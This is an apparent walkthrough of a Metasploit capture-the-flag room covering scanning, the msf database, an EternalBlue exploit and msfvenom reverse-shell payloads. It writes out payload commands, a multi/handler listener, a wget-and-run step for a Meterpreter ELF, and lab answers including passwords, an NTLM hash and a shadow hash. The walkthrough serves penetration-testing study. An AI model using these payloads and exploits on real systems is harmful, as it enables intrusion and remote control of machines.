Tasks
- Task 1 — Introduction
- Task 2 — Scanning
- Task 3 — The Metasploit Database
- Task 4 — Vulnerability Scanning
- Task 5 — Exploitation
- Task 6 — Msfvenom
- Task 7 — Summary
Task 1 — Introduction
This is the follow-up room to the Metasploit introduction. If the last room was about getting comfortable with how Metasploit is structured, this one is where you start doing things with it. Real scanning, exploitation, payloads.
The topics this room covers: Scanning target systems using Metasploit, using the Metasploit database feature to keep things organized, vulnerability scanning, exploiting vulnerable services, and using msfvenom to generate payloads and get a Meterpreter session going.
One thing to note before starting: any task in this room that needs a wordlist uses this one specifically:
/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
If you’re on the AttackBox it’s already there. If you’re on your own machine, download it from the task files. Don’t forget this or you’ll waste time wondering why your brute force isn’t finding anything.
Task 2 — Scanning
So Metasploit isn’t just for exploitation. It has a bunch of scanning modules too. You can find the port scanning ones by running:
search portscan
That’ll give you a list including things like TCP SYN scanner, ACK firewall scanner, FTP bounce scanner, and a few others. They’re all auxiliary modules under auxiliary/scanner/portscan/.
To use one, you pick it with use, then check its options with show options. The main things you’ll be setting are:
- RHOSTS — the target IP
- PORTS — the port range to scan
- THREADS — how many threads to run. More threads = faster scan. Don’t go crazy with it though.
Worth knowing: the PORTS default of 1-10000 here is not the same as what Nmap does by default. Nmap scans the top 1000 most common ports, which is not necessarily port numbers 1 through 1000. Metasploit just literally scans 1 to 10000 in order. Different thing.
That said, you can also just run Nmap directly from inside msfconsole. Just type nmap followed by your flags and target and it hands it off to the system. Handy so you don’t have to switch between windows.
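To make the "literal range vs top ports" distinction concrete, here is an added example (mine, not code from the room or from Metasploit) that parses the PORTS option syntax the portscan modules accept (comma-separated numbers and hyphenated ranges) into the exact set of ports it covers, and compares that set with an explicit frequency-ordered list. The CONSTRUCTED_TOP_PORTS list is a made-up stand-in for illustration, not Nmap's real top-1000 table.

```python
import re

# Valid port numbers; the PORTS option in the portscan modules accepts
# comma-separated numbers and hyphenated ranges such as "1-10000".
PORT_MIN, PORT_MAX = 1, 65535


def expand_port_spec(spec: str) -> list[int]:
    """Expand a Metasploit-style PORTS spec into a sorted list of unique ports.

    Accepts forms like "1-10000", "22,80,443" or "21-25,80,8000-8010".
    Raises ValueError on malformed tokens, reversed ranges or out-of-range ports.
    """
    ports: set[int] = set()
    for token in spec.replace(" ", "").split(","):
        if not token:
            raise ValueError("empty port token in spec %r" % spec)
        m = re.fullmatch(r"(\d+)(?:-(\d+))?", token)
        if m is None:
            raise ValueError("malformed port token %r" % token)
        lo = int(m.group(1))
        hi = int(m.group(2)) if m.group(2) else lo
        if lo > hi:
            raise ValueError("reversed range %r" % token)
        if lo < PORT_MIN or hi > PORT_MAX:
            raise ValueError("port out of range in %r" % token)
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def compare_port_sets(spec: str, top_ports: list[int]) -> dict:
    """Report how a literal PORTS spec differs from an explicit "top ports" list.

    Returns the number of ports each approach scans, the ports only the literal
    spec covers and the ports only the top-ports list covers.
    """
    spec_ports = set(expand_port_spec(spec))
    top = set(top_ports)
    return {
        "spec_count": len(spec_ports),
        "top_count": len(top),
        "only_in_spec": sorted(spec_ports - top),
        "only_in_top": sorted(top - spec_ports),
    }


# Constructed stand-in for a frequency-ordered port list (NOT Nmap's real
# top-1000 table): a handful of common service ports, some above 1000.
CONSTRUCTED_TOP_PORTS = [21, 22, 23, 25, 53, 80, 139, 443, 445, 3389, 8000, 8080]

if __name__ == "__main__":
    print(expand_port_spec("21-25,80,8000-8002"))
    # A literal "1-1000" never reaches 3389, 8000 or 8080, while a top-ports
    # list does; that is the difference the text above describes.
    print(compare_port_sets("1-1000", CONSTRUCTED_TOP_PORTS))
```

The validation matters more than it looks: a reversed range or a typo like "1-100000" silently becomes a much smaller or failed scan in practice, so rejecting it up front is cheaper than wondering later why nothing was found.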
UDP scanning
There’s a module called scanner/discovery/udp_sweep that quickly checks for common UDP services. It won’t find everything but it can pick up things like DNS and NetBIOS fast. Good for a quick first pass.
SMB scanning
Metasploit has some really solid SMB-focused scanners. smb_version will tell you what Windows version is running on the target. smb_enumshares will list out any shared folders. These are genuinely useful in a corporate environment where there are loads of Windows machines sitting around.
On that note, NetBIOS is worth paying attention to. It’s an older protocol but it’s still everywhere on Windows networks. The NetBIOS name of a machine can tell you a lot about what it is. Something named CORP-DC is probably a domain controller. Something named DEVOPS is probably something you want to poke at. And sometimes these machines have shared folders accessible without any password at all, or with something embarrassingly simple like “admin” or “root.”
The general idea is: the more you know about what’s running on the target, the more options Metasploit gives you. Scanning properly before jumping into exploitation makes the whole process a lot smoother.
Question: How many ports are open on the target system? 5
Question: Using the relevant scanner, what NetBIOS name can you see? ACME IT SUPPORT
Question: What is running on port 8000? webfs/1.21
Question: What is the “penny” user’s SMB password? leo1234
Task 3 — The Metasploit Database
This task is less about hacking things and more about staying organized. When you’re only dealing with one target it feels like overkill. When you’ve got 30 machines in scope it becomes genuinely necessary.
Metasploit can connect to a PostgreSQL database to store all your scan results, hosts, services, and vulnerabilities. On the AttackBox this is already set up. If you’re on your own Kali install you’ll need to do a bit of setup first:
- Start PostgreSQL:
systemctl start postgresql
- Initialize the Metasploit database:
sudo -u postgres msfdb init
Note: running msfdb init as root throws an error. You have to run it as the postgres user with sudo. It’s one of those things that’ll catch you out the first time.
Once that’s done, launch msfconsole and check it’s working:
db_status
You should see something like Connected to msf. Connection type: postgresql. If you see an error instead, something went wrong with the setup.
Workspaces
The database lets you create separate workspaces for different engagements. That way your scan data from one client doesn’t get mixed in with another. You manage them with the workspace command:
- workspace — list all workspaces, the current one has a * next to it
- workspace -a tryhackme — create a new workspace called tryhackme
- workspace tryhackme — switch to that workspace
- workspace -d tryhackme — delete it
- workspace -h — see all the options
Scanning into the database
Instead of regular nmap, use db_nmap. It runs the exact same scan but automatically saves everything to the database:
db_nmap -sV -p- 10.10.12.229
After that you can use hosts to see all the machines you’ve scanned and services to see all the services that were found. The services command also supports searching with -S, so something like services -S netbios will only show you NetBIOS-related services. Really useful when you’ve got a big list and you’re looking for something specific.
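As an added example (not code from the room or from Metasploit), this parses a constructed excerpt in the shape of msfconsole's column-aligned services table and applies a case-insensitive regex filter the way services -S does, then collects the matching hosts into a single RHOSTS-style value. The host, banners and rows are made up for the example (only the webfs/1.21 banner on port 8000 is the one the room reports); the parser assumes the table keeps the aligned header and dashed underline layout shown.

```python
import re

# Constructed excerpt in the shape of msfconsole's `services` output.
# Rows and banners are made up; only port 8000's banner comes from the room.
CONSTRUCTED_SERVICES_OUTPUT = """\
Services
========

host          port  proto  name         state  info
----          ----  -----  ----         -----  ----
10.10.12.229  22    tcp    ssh          open   OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
10.10.12.229  139   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
10.10.12.229  445   tcp    netbios-ssn  open   Samba smbd 4.7.6-Ubuntu workgroup: WORKGROUP
10.10.12.229  8000  tcp    http         open   webfs/1.21
"""


def parse_services_table(text: str) -> list[dict]:
    """Parse the column-aligned table into a list of dicts keyed by header name.

    Column boundaries come from the start offset of each header word, so the
    free-text 'info' column (which contains spaces) is sliced correctly instead
    of being split on whitespace.
    """
    lines = text.splitlines()
    # The header is the non-empty line immediately followed by a dashed underline.
    for i in range(len(lines) - 1):
        nxt = lines[i + 1]
        if lines[i].strip() and "-" in nxt and re.fullmatch(r"[-\s]+", nxt):
            header_idx = i
            break
    else:
        raise ValueError("no column header found")
    header = lines[header_idx]
    names = [m.group() for m in re.finditer(r"\S+", header)]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    rows = []
    for line in lines[header_idx + 2:]:
        if not line.strip():
            continue
        rows.append({name: line[a:b].strip() for name, (a, b) in zip(names, bounds)})
    return rows


def search_services(rows: list[dict], pattern: str) -> list[dict]:
    """Mimic `services -S <pattern>`: case-insensitive regex match on any column."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [r for r in rows if any(rx.search(v) for v in r.values())]


def rhosts_from_services(rows: list[dict], pattern: str) -> str:
    """Collect the unique hosts behind matching services as a space-separated
    RHOSTS value, which is what you would otherwise assemble by hand."""
    seen: list[str] = []
    for r in search_services(rows, pattern):
        if r["host"] not in seen:
            seen.append(r["host"])
    return " ".join(seen)


if __name__ == "__main__":
    table = parse_services_table(CONSTRUCTED_SERVICES_OUTPUT)
    for row in search_services(table, "netbios"):
        print(row["host"], row["port"], row["name"], row["info"])
    print("RHOSTS =", rhosts_from_services(table, "netbios"))
```

Slicing by header offsets rather than splitting on whitespace is the point: the info column holds whole banners with spaces, and a naive split would shred "Samba smbd 3.X - 4.X" into separate fields.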
Setting RHOSTS from the database
Once you’ve got hosts in the database you can do hosts -R while inside a module context and it’ll automatically set RHOSTS to all the hosts stored. If you’ve scanned a whole subnet and want to run the same module against everything you found, you don’t have to type out every IP. One command and it populates the whole list.
The example workflow the room gives is a good one to understand:
- Scan the network with db_nmap
- Use hosts -R to populate RHOSTS automatically
- Run a vulnerability scanner like auxiliary/scanner/smb/smb_ms17_010 against everything at once
- Check results, pick your targets
When looking for things to attack, the room suggests keeping an eye out for:
- HTTP services that might have web app vulnerabilities like SQL injection or RCE
- FTP that might allow anonymous login
- SMB that might be vulnerable to something like MS17-010
- SSH with weak or default credentials
- RDP with weak passwords or known CVEs like BlueKeep
Task 4 — Vulnerability Scanning
So “low hanging fruit” is the phrase that comes up here. It means vulnerabilities that are easy to find and easy to exploit. They won’t always exist, but when they do you want to find them fast.
Metasploit’s scanner modules are really good for this. The better you are at the scanning and fingerprinting phase the more you get out of Metasploit. If you find that a target is running VNC for example, you can search for VNC modules:
use auxiliary/scanner/vnc/
Tab completion gives you the options: ard_root_pw, vnc_login, vnc_none_auth. The vnc_login one is a credential brute forcer. The vnc_none_auth one checks if VNC is set up with no authentication at all, which happens more than you’d think.
Running info on any module before you use it is a good habit. It’ll show you who wrote it, what CVEs it covers, what all the options actually mean, and sometimes warnings about things that could go wrong. Worth a read especially on anything that says it might crash the target.
The SMTP open relay check is another example. An open relay means the mail server will forward emails for anyone without authentication. That’s bad because it can be used to send spam or phishing emails that look like they came from a legitimate server. Metasploit has a module for checking this.
Question: Who wrote the module that allows us to check SMTP servers for open relay? Campbell Murray
You find this by loading the module and running info. The “Provided by” section at the top tells you.
Task 5 — Exploitation
This is the part everyone’s here for. Metasploit has over 2000 exploits covering basically every major OS and platform. The basic workflow is always the same: search for the exploit, select it, set your options, run it.
One thing that’s easy to forget is that you can change the payload after selecting an exploit. The default is fine a lot of the time but show payloads will list every compatible payload for that exploit. You pick one with set payload followed by the number or full name. Different payloads have different requirements too, so after switching payload always run show options again to see if any new parameters appeared. A reverse payload for example will always need LHOST set to your attacking machine’s IP.
The room demonstrates exploitation using MS17-010 EternalBlue against a Windows 7 target. The module is exploit/windows/smb/ms17_010_eternalblue. You set RHOSTS to the target IP, LHOST to your own IP, and fire it. When it works you get dropped into a shell on the target.
Something to know going in: picking the right payload is sometimes trial and error. Firewalls, antivirus, what interpreters are installed on the target, whether certain programs exist, all of it can affect whether a payload actually works. If one fails, try another. It’s not always clean on the first go.
Once you have a shell you can background it with CTRL+Z. It’ll ask you to confirm and then you’re back at the module prompt with the session saved. sessions shows you everything that’s open. sessions -i 1 drops you back into session 1. sessions -K kills everything if you need to clean up.
The -z flag (exploit -z) is also useful. It runs the exploit and immediately backgrounds the session when it opens so you don’t get dropped into it. Good when you’re chaining multiple exploits or opening sessions on several targets quickly.
For the target in this task the exploit to go for is EternalBlue. Once you’re in, poke around for the flag.
Question: What is the content of the flag.txt file? THM-5455554845
Question: What is the NTLM hash of the password of the user “pirate”? 8ce9a3ebd1647fcc5e04025019f4b875
Task 6 — Msfvenom
msfvenom is a standalone tool that ships with Metasploit. It replaced two older tools called Msfpayload and Msfencode and does what both of them did. You use it to generate payloads as files you can drop onto a target.
The basic format is:
msfvenom -p [payload] LHOST=[your IP] LPORT=[your port] -f [format] > [output file]
You can list every available payload with msfvenom -l payloads. It’s a long list. Android, iOS, Windows, Linux, PHP, Python, it’s all there.
Output formats
msfvenom --list formats shows you everything it can output. The ones you’ll use most often are:
- elf for Linux executables
- exe for Windows executables
- raw for things like PHP or Python where you want the code directly
- asp for ASP web shells
Encoders
The room is honest about this and it’s worth repeating: encoders don’t really bypass modern antivirus. They encode the payload (the PHP base64 example in the room is a good illustration of what the output looks like) but AV these days does a lot more than just signature matching. If bypassing AV is the goal, you need proper obfuscation techniques or shellcode injection methods, not just -e php/base64. Don’t go into this thinking encoding is a magic trick.
The PHP file thing
One gotcha the room flags: when you generate a PHP payload with msfvenom and output it as raw, the resulting file is missing the opening <?php tag and the closing ?> tag. You have to add them manually before the file will actually execute as PHP.
Handling incoming connections with multi/handler
When you generate a standalone payload and somehow get it onto a target (file upload vulnerability, social engineering, whatever), you need something listening on your end to catch the connection when it calls back. That’s what exploit/multi/handler is for.
It supports every Metasploit payload. You just set it to the same payload, LHOST, and LPORT you used in msfvenom and run it. It sits there and waits. When the payload executes on the target the connection comes in and you get your shell or Meterpreter session.
Setup looks like this:
use exploit/multi/handler
set payload php/reverse_php
set lhost [your IP]
set lport 7777
run
Then you trigger the payload on the target and the session opens up on your end.
Common payload commands by platform:
Linux ELF:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows EXE:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
All of these are reverse payloads so they all need multi/handler running with matching settings on your side.
For the practical part of this task:
The target machine credentials are murphy / 1q2w3e4r. You can SSH in or use the browser terminal. Once in, run sudo su to get a root shell.
Then on your attacking machine generate the payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[your IP] LPORT=4444 -f elf > shell.elf
Host it with a quick Python web server:
python3 -m http.server 9000
On the target machine download it:
wget http://[your IP]:9000/shell.elf
chmod +x shell.elf
Back on your attacking machine, set up multi/handler before you run the payload:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost [your IP]
set lport 4444
run
Then on the target run ./shell.elf and your Meterpreter session opens up.
Question: What is the other user’s password hash? $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Task 7 — Summary
That’s the exploitation room done. It covered a lot more ground than the intro room.
The database stuff is easy to skip over when you’re just doing single-target CTF rooms but it’s useful to understand. Real engagements have scope, multiple machines, and you need to track what you’ve found. Workspaces and db_nmap make that manageable.
The msfvenom section is probably the most practically useful bit if you’re heading toward more advanced stuff. Being able to generate a payload in whatever format you need and catch the callback with multi/handler is a nice skill. The PHP file gotcha with the missing tags is the kind of thing that’ll waste 20 minutes of your life the first time you hit it so at least now you know.
Next up is the Meterpreter room where post-exploitation gets properly covered. That’s where things start getting really interesting.
On to the next one.